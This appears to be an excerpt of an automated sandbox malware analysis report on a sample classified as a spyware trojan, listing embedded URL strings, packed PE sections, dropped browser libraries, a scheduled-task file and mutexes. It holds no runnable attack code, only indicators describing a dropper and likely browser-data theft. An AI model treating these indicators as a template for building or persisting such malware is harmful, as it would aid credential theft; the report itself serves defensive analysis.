Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: Wf9qnVcbi8.exe, 528307a0ac.exe.12.dr, random[1].exe.12.dr String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: Wf9qnVcbi8.exe, 528307a0ac.exe.12.dr, random[1].exe.12.dr String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: Wf9qnVcbi8.exe, 528307a0ac.exe.12.dr, random[1].exe.12.dr String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.5.dr String found in binary or memory: http://upx.sf.net
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2226915116.000000006C5BD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: Wf9qnVcbi8.exe, 00000000.00000002.2212747709.000000001D305000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2226772721.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: AECAECFC.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Wf9qnVcbi8.exe, 00000000.00000002.2198516833.0000000001797000.00000004.00000020.00020000.00000000.sdmp, AKJEGCFBGDHJJJJJKJEC.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: Wf9qnVcbi8.exe, 00000000.00000002.2198516833.0000000001797000.00000004.00000020.00020000.00000000.sdmp, AKJEGCFBGDHJJJJJKJEC.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: AECAECFC.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Wf9qnVcbi8.exe, 00000000.00000002.2198516833.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, AECAECFC.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Wf9qnVcbi8.exe, 00000000.00000002.2198516833.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, AECAECFC.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Wf9qnVcbi8.exe, 00000000.00000002.2198516833.0000000001797000.00000004.00000020.00020000.00000000.sdmp, AKJEGCFBGDHJJJJJKJEC.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Wf9qnVcbi8.exe, 00000000.00000002.2198516833.0000000001797000.00000004.00000020.00020000.00000000.sdmp, AKJEGCFBGDHJJJJJKJEC.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: Wf9qnVcbi8.exe, 00000000.00000002.2198516833.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, AECAECFC.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AECAECFC.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Wf9qnVcbi8.exe, 00000000.00000002.2198516833.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, AECAECFC.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: AKJEGCFBGDHJJJJJKJEC.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: AKJEGCFBGDHJJJJJKJECFCFCAA.0.dr String found in binary or memory: https://support.mozilla.org
Source: AKJEGCFBGDHJJJJJKJECFCFCAA.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: AKJEGCFBGDHJJJJJKJECFCFCAA.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: Wf9qnVcbi8.exe, 00000000.00000002.2198516833.0000000001797000.00000004.00000020.00020000.00000000.sdmp, AKJEGCFBGDHJJJJJKJEC.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: Wf9qnVcbi8.exe, 00000000.00000002.2198516833.0000000001797000.00000004.00000020.00020000.00000000.sdmp, AKJEGCFBGDHJJJJJKJEC.0.dr String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: Wf9qnVcbi8.exe, 00000000.00000002.2198516833.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, AECAECFC.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: AECAECFC.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: AKJEGCFBGDHJJJJJKJECFCFCAA.0.dr String found in binary or memory: https://www.mozilla.org
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.0000000000676000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: AKJEGCFBGDHJJJJJKJECFCFCAA.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.0000000000676000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.0000000000676000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: AKJEGCFBGDHJJJJJKJECFCFCAA.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.0000000000676000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: Wf9qnVcbi8.exe, 00000000.00000003.2137149641.000000002F468000.00000004.00000020.00020000.00000000.sdmp, AKJEGCFBGDHJJJJJKJECFCFCAA.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: AKJEGCFBGDHJJJJJKJECFCFCAA.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Wf9qnVcbi8.exe, 00000000.00000003.2137149641.000000002F468000.00000004.00000020.00020000.00000000.sdmp, AKJEGCFBGDHJJJJJKJECFCFCAA.0.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: Wf9qnVcbi8.exe, 00000000.00000003.2137149641.000000002F468000.00000004.00000020.00020000.00000000.sdmp, AKJEGCFBGDHJJJJJKJECFCFCAA.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000071A000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

System Summary

Source: IDGHDGIDAK.exe.0.dr Static PE information: section name:
Source: IDGHDGIDAK.exe.0.dr Static PE information: section name: .idata
Source: IDGHDGIDAK.exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: explorti.exe.7.dr Static PE information: section name:
Source: explorti.exe.7.dr Static PE information: section name: .idata
Source: explorti.exe.7.dr Static PE information: section name:
Source: Wf9qnVcbi8.exe Static PE information: section name:
Source: Wf9qnVcbi8.exe Static PE information: section name:
Source: Wf9qnVcbi8.exe Static PE information: section name:
Source: Wf9qnVcbi8.exe Static PE information: section name:
Source: Wf9qnVcbi8.exe Static PE information: section name:
Source: random[1].exe.12.dr Static PE information: section name:
Source: random[1].exe.12.dr Static PE information: section name:
Source: random[1].exe.12.dr Static PE information: section name:
Source: random[1].exe.12.dr Static PE information: section name:
Source: random[1].exe.12.dr Static PE information: section name:
Source: 528307a0ac.exe.12.dr Static PE information: section name:
Source: 528307a0ac.exe.12.dr Static PE information: section name:
Source: 528307a0ac.exe.12.dr Static PE information: section name:
Source: 528307a0ac.exe.12.dr Static PE information: section name:
Source: 528307a0ac.exe.12.dr Static PE information: section name:
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5AB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C5AB700
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5AB8C0 rand_s,NtQueryVirtualMemory, 0_2_6C5AB8C0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5AB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C5AB910
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C54F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C54F280
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5435A0 0_2_6C5435A0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5B545C 0_2_6C5B545C
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C555440 0_2_6C555440
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C585C10 0_2_6C585C10
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C592C10 0_2_6C592C10
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5BAC00 0_2_6C5BAC00
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5B542B 0_2_6C5B542B
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C56D4D0 0_2_6C56D4D0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5564C0 0_2_6C5564C0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C586CF0 0_2_6C586CF0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C54D4E0 0_2_6C54D4E0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C556C80 0_2_6C556C80
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5A34A0 0_2_6C5A34A0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5AC4A0 0_2_6C5AC4A0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C570512 0_2_6C570512
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C56ED10 0_2_6C56ED10
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C55FD00 0_2_6C55FD00
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C580DD0 0_2_6C580DD0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5A85F0 0_2_6C5A85F0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C569E50 0_2_6C569E50
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C583E50 0_2_6C583E50
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C564640 0_2_6C564640
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C592E4E 0_2_6C592E4E
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C54C670 0_2_6C54C670
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5B6E63 0_2_6C5B6E63
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C587E10 0_2_6C587E10
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C595600 0_2_6C595600
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5A9E30 0_2_6C5A9E30
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C54BEF0 0_2_6C54BEF0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C55FEF0 0_2_6C55FEF0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5B76E3 0_2_6C5B76E3
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C565E90 0_2_6C565E90
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5AE680 0_2_6C5AE680
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5A4EA0 0_2_6C5A4EA0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C587710 0_2_6C587710
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C559F00 0_2_6C559F00
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C576FF0 0_2_6C576FF0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C54DFE0 0_2_6C54DFE0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5977A0 0_2_6C5977A0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C568850 0_2_6C568850
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C56D850 0_2_6C56D850
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C58F070 0_2_6C58F070
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C557810 0_2_6C557810
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C58B820 0_2_6C58B820
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C594820 0_2_6C594820
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5B50C7 0_2_6C5B50C7
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C56C0E0 0_2_6C56C0E0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5858E0 0_2_6C5858E0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5760A0 0_2_6C5760A0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C56A940 0_2_6C56A940
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C59B970 0_2_6C59B970
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5BB170 0_2_6C5BB170
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C55D960 0_2_6C55D960
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C585190 0_2_6C585190
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5A2990 0_2_6C5A2990
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C57D9B0 0_2_6C57D9B0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C54C9A0 0_2_6C54C9A0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C589A60 0_2_6C589A60
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C588AC0 0_2_6C588AC0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C561AF0 0_2_6C561AF0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C58E2F0 0_2_6C58E2F0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5BBA90 0_2_6C5BBA90
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C55CAB0 0_2_6C55CAB0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5B2AB0 0_2_6C5B2AB0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5422A0 0_2_6C5422A0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C574AA0 0_2_6C574AA0
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C545340 0_2_6C545340
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C55C370 0_2_6C55C370
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C58D320 0_2_6C58D320
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5B53C8 0_2_6C5B53C8
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C54F380 0_2_6C54F380
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_002FE410 12_2_002FE410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_00333048 12_2_00333048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_002F4CD0 12_2_002F4CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_00327D63 12_2_00327D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_0033763B 12_2_0033763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_00341684 12_2_00341684
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_00336EE9 12_2_00336EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_002F4AD0 12_2_002F4AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_00338700 12_2_00338700
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_0033775B 12_2_0033775B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_00332BB0 12_2_00332BB0
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B0850 13_2_7F4B0850
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Code function: 13_2_7F4B0000 13_2_7F4B0000
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: String function: 6C5894D0 appears 90 times
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: String function: 6C57CBE8 appears 134 times
Source: Wf9qnVcbi8.exe, 00000000.00000002.2227283252.000000006C7C5000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs Wf9qnVcbi8.exe
Source: Wf9qnVcbi8.exe, 00000000.00000002.2226960856.000000006C5D2000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs Wf9qnVcbi8.exe
Source: Wf9qnVcbi8.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Wf9qnVcbi8.exe Static PE information: Section: ZLIB complexity 0.9996903582317073
Source: Wf9qnVcbi8.exe Static PE information: Section: ZLIB complexity 0.99505615234375
Source: Wf9qnVcbi8.exe Static PE information: Section: ZLIB complexity 0.990234375
Source: IDGHDGIDAK.exe.0.dr Static PE information: Section: ZLIB complexity 0.99822831284153
Source: IDGHDGIDAK.exe.0.dr Static PE information: Section: lwthcuux ZLIB complexity 0.9949199969951923
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.99822831284153
Source: amadka[1].exe.0.dr Static PE information: Section: lwthcuux ZLIB complexity 0.9949199969951923
Source: explorti.exe.7.dr Static PE information: Section: ZLIB complexity 0.99822831284153
Source: explorti.exe.7.dr Static PE information: Section: lwthcuux ZLIB complexity 0.9949199969951923
Source: random[1].exe.12.dr Static PE information: Section: ZLIB complexity 0.9996903582317073
Source: random[1].exe.12.dr Static PE information: Section: ZLIB complexity 0.99505615234375
Source: random[1].exe.12.dr Static PE information: Section: ZLIB complexity 0.990234375
Source: 528307a0ac.exe.12.dr Static PE information: Section: ZLIB complexity 0.9996903582317073
Source: 528307a0ac.exe.12.dr Static PE information: Section: ZLIB complexity 0.99505615234375
Source: 528307a0ac.exe.12.dr Static PE information: Section: ZLIB complexity 0.990234375
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@17/30@0/3
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Code function: 0_2_6C5A7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C5A7030
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5284:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File created: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\528307a0ac.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
